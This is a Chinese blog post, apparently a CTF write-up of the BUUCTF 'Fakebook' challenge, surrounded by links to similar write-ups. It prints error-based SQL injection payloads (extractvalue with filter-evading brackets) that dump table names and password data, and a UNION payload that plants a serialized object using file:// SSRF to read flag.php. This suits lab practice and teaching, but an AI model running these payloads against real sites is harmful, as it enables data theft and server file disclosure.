buuctf [网鼎杯 2018]Fakebook 记录

最新推荐文章于 2023-10-08 20:36:48 发布
最新推荐文章于 2023-10-08 20:36:48 发布
阅读量3.5k 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SopRomeo/article/details/104493303
版权

首先注册一个账号进去,再查看账户信息,注意url

http://2924ddd2-5831-448c-9833-d0aaba7a1fbe.node3.buuoj.cn/view.php?no=1

可能存在sql注入,利用常规的探测,发现他是整形注入,一般的注入行不通,双写绕过不行,试试报错注入,
playload:1 and extractvalue(1,concat('~',(select(group_concat(database())))))%23
在这里插入图片描述
这边需要注意,0x7e已经被过滤掉了,所以我们用‘~’代替,其实0x7e就是指那个符号,这边其实没过滤空格,但是为了省事,万一过滤了空格就很麻烦,所以直接用括号代替了空格,接着查表

playload:1 and extractvalue(1,concat('~',(select(group_concat(table_name))from(information_schema.tables)where(table_schema)='fakebook')))%23
在这里插入图片描述
查字段1 and extractvalue(1,concat('~',(select(group_concat(column_name))from(information_schema.columns)where(table_name)='users')))%23
在这里插入图片描述
直接查passwd字段
playload:1 and extractvalue(1,concat('~',(select(group_concat(right(passwd,32)))from(fakebook.users))))%23
查到这我傻了,这就是我刚刚注册的信息啊,再查查data
利用left和right函数进行拼接发现是反序列化

O:8:“UserInfo”:3:{s:4:“name”;s:“123456”;s:3:“age”;i:18;s:4:“blog”;s:5:“5.com”;}

没思路了。看了大佬的web,居然要用到后台扫描工具,看来以后得学学了,目前对工具的使用不是很熟练。
发现隐藏的robots.txt,其中有源码泄漏(/user.php.bak)
然后就是代码审计了,具体过程在此

思路
利用no参数进行注入,在反序列化中构造file文件协议,利用服务端请求伪造漏洞访问服务器上的flag.php文件。大佬用御剑扫出来了,不知道为啥我扫不出

利用序列化:
在这里插入图片描述
playlod:0/**/union/**/select%201,2,3,%27O:8:"UserInfo":3:{s:4:"name";s:1:"1";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}%27%23

居然还有这种绕过技巧,
在这里插入图片描述
接着读取文件即可。

附上大佬题解

penson by 小乌
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
fakebook:Facebook的克隆
05-23
该自述文件通常会记录启动和运行应用程序所需的所有步骤。 您可能要讲的内容: Ruby版本 系统依赖 配置 数据库创建 数据库初始化 如何运行测试套件 服务(作业队列,缓存服务器,搜索引擎等) 部署说明 ...
[网鼎杯 2018]Fakebook1
陈艺秋的博客
06-08 1202
结合起来得出结论,以上代码存在ssrf和反序列化,当我们注册后,把我们的信息序列化一下,然后存进data。注册的其他行数据,差不多都可以乱填,只有一个blog项,估计是后台做了一些限制(必须包含某些字符之类的),随便填会报错。得到关键信息,前面都没有注意这段报错信息,这里包含了一个反序列化函数,和一段路径,后面会用到。路径是之前注入的时候报错爆出来的,序列化值也不用自己生成,之前注入出来了,改长度和值就行。因为出现上面的情况,所以猜测不是字符型注入,用了一点小方法,出现计算,说明是整数型注入。
BUUCTF——[网鼎杯 2018]Fakebook
Ho1aAs‘s Blog
05-24 402
文章目录利用点解题无 利用点 SQL注入 SSRF读文件 解题 打开环境,没有任何提示,先试试基础功能,注册一个号,回到主页可以点进去看记录 发现URL是拼接上序号的,试试SQL注入,发现是字符型闭合单引号的注入 先看看字段数 无 ...
BUUCTF-[网鼎杯 2018]Fakebook
qq_43006864的博客
04-20 1720
打开题目 点击login,一个登陆界面。没啥发现。 点击join。注册一个账号看看。 这里可以看到:http://46021289-6e25-4fee-b4db-f69979ef4362.node4.buuoj.cn:81/view.php?no=1 盲猜可以sql注入。测试了一下,貌似还不需要闭合,直接接语句就可以。 测试出来字段为4,开始尝试获取数据库信息。 貌似有waf,尝试使用/**/绕过。 成功绕过,并且发现注入点...
BUUCTF__[网鼎杯 2018]Fakebook_题解
风过江南乱的博客
07-04 2031
BUUCTF__[网鼎杯 2018]Fakebook_题解
[网鼎杯 2018]Fakebook(思路详细有说明)
weixin_73560599的博客
07-31 685
这题较为综合 涉及了SQL注入以及SSRF和反序列化以及ctf扫目录脚本工具的使用 是一道小综合的题目
mp12_social_network_fakebook_person
05-15
Mp12-社交网络(Fakebook)(人)[ManyToMany] 该应用程序将具有一个名为Person的实体,可以通过/ persons端点进行管理。 帖子将添加一个人,获取将显示所有这些人。 为了使一个人与另一个人成为朋友,我们将向终端...
fakebook-backend:学习个人项目探索MERN堆栈
04-10
Fakebook后端(express和mongodb)(这是一个学习/探索MERN堆栈的个人项目)入门: 确保已安装节点克隆仓库在fakebook文件夹中,创建一个带有dev.env文件的配置文件夹设置环境变量:PORT:value,MONGODB_URL = ...
Fakebook-Day2:在第2天之后,在完善蓝图功能之前
03-31
在“Fakebook-Day2:在第2天之后,在完善蓝图功能之前”这个项目中,我们主要探讨的是如何利用Python编程语言来构建一个类似Facebook的社交网络平台。在第二天的开发阶段,我们的重点在于完善项目的蓝图(Blueprint)...
webcrawler:一个简单的Java实现的网络爬虫,支持自动登录
06-24
第一个网络爬虫介绍Webcrawler 是一个简单的网络爬虫。 它实现了自动登录和内容获取的基本功能。... 如果登录失败,程序将被终止。 登录后,爬虫将开始获取它可以在网站内找到的每个链接。 过滤器用于阻止爬虫获取外部...
[网鼎杯 2018]Fakebook——SSRF/反序列化漏洞/SQL注入
sGanYu
09-29 3594
解法一 解法二 解法三 考点 • 目录扫描 • SSRF • SQL注入 • PHP反序列化 前言:当我们拿到网站的时候,首先需要对这个网站进行信息收集,扩大漏洞发现的概率,比如whois、指纹识别、扫描目标站点的目录,寻找敏感信息、后台又或者是否存在备份文件,其实靶场也一样,如果觉得麻烦,也可能错过发现一个可利用的漏洞 开始之前,先扫描一下该网站下目录,查看有什么敏感信息泄露 直接扫出了flag.php文件,有是有,但是访问后,回显内容为空,当我们确定了一个
BUUCTF--[网鼎杯2018]Unfinish
qq_46263951的博客
07-14 774
首先进入页面后我们发现有两个输入框,简单尝试后并没有发现可用漏洞,使用dirsearch扫描后找到一个register.php 进入register.php我们可以进行注册,成功注册后可以发现登录进去后账户名显示出来了,推测存在二次注入 方法一: HEX:返回十六进制数值表示形式 import requests login_url='http://220.249.52.133:39445/login.php' register_url='http://220.249.52.133:39.
【复习】BUUCTF:[网鼎杯2018]Unfinish --- python爬虫 + re sql注入,substr二次注入,hex二次注入 不用bool注入点的substr
Zero_Adam的博客
05-04 1124
目录:一、自己做:二、学到的三、 学习WPpython爬虫 + re 尝试(尝试思路,):1. substr思路:最后的payloadhex思路: 一、自己做: 测试,看到用户名有回显,那么就是又一次从数据库中查询数据,可能有SQL注入的可能,然后我在注册用户名的时候,加上了 ',然后就死活注册不了,, 也不给我报错,,我在这里也想了一会,,想不明白 后来想到了,可能是报错,然后就没执行,然后我用了万能密码来的。 用户名:a'1 or '1。 你注册成功后,他就会自动跳转到login.php的。 然后用邮箱
[网鼎杯 2018]Fakebook1解题思路
最新发布
xiyuanyue的博客
10-08 303
s:3:"age";s:4:"blog";6、一般flag存储在根目录的flag文件或者flag.php文件修改data 数据O:8:"UserInfo":3:{s:4:"name";s:3:"age";s:4:"blog";
buu做题笔记——[网鼎杯 2018]Fakebook
weixin_46330722的博客
11-16 227
BUU[网鼎杯 2018]Fakebook [网鼎杯 2018]Fakebook 进入题目就只有login和join两个按钮 我们先创建一个用户。 这里注意blog需要是个网址,不然会注册失败。注册成功后就能在列表中看到,这个和之前做的SWPUCTF2019 wb1很像,一开始我以为也是个二次注入,就在这试了一会儿,结果发现不是。我们点开自己注册的用户。 发现url上有个no参数,有可能存在注入,加个单引号试试。 有报错,应该是存在注入的。试了一会发现这个参数没有被单引号包裹,直接注就行。但是在联
[网鼎杯 2018]Fakebook 1
m0_73728268的博客
03-29 206
1.SSRF伪协议漏洞注入 2.SSRF中的伪协议
BUUCTF[网鼎杯 2018]Fakebook 1
snowlyzz的博客
05-01 857
来到首页先创建了一个用户 点击自己创建的用户admin: 发现url 疑似有sql注入。   ?n=1 and 1=1 正常回显   ?n=1 and 1=2 回显异常(存在SQL注入)   ?n=1 order by 1# 正常回显   ?n=1 order by 2# 正常回显   ?n=1 order by 3# 正常回显   ?n=1 order by 4# 正常回显   ?n=1 order by 5# 回显异常(判断存在4个字段) 直接联合查询,发现 uni...
SSRF漏洞file伪协议之[网鼎杯 2018]Fakebook1
qq_58970968的博客
07-06 1480
关于SSRF漏洞(服务器端伪造)参考SSRF漏洞原理攻击与防御(超详细总结)_零点敲代码的博客-CSDN博客_ssrf漏洞防御SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)SSRF攻击可能存在任何语言编写的应用,接下来将举例php中可能存在SSRF漏洞的函数。1、file_get_

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值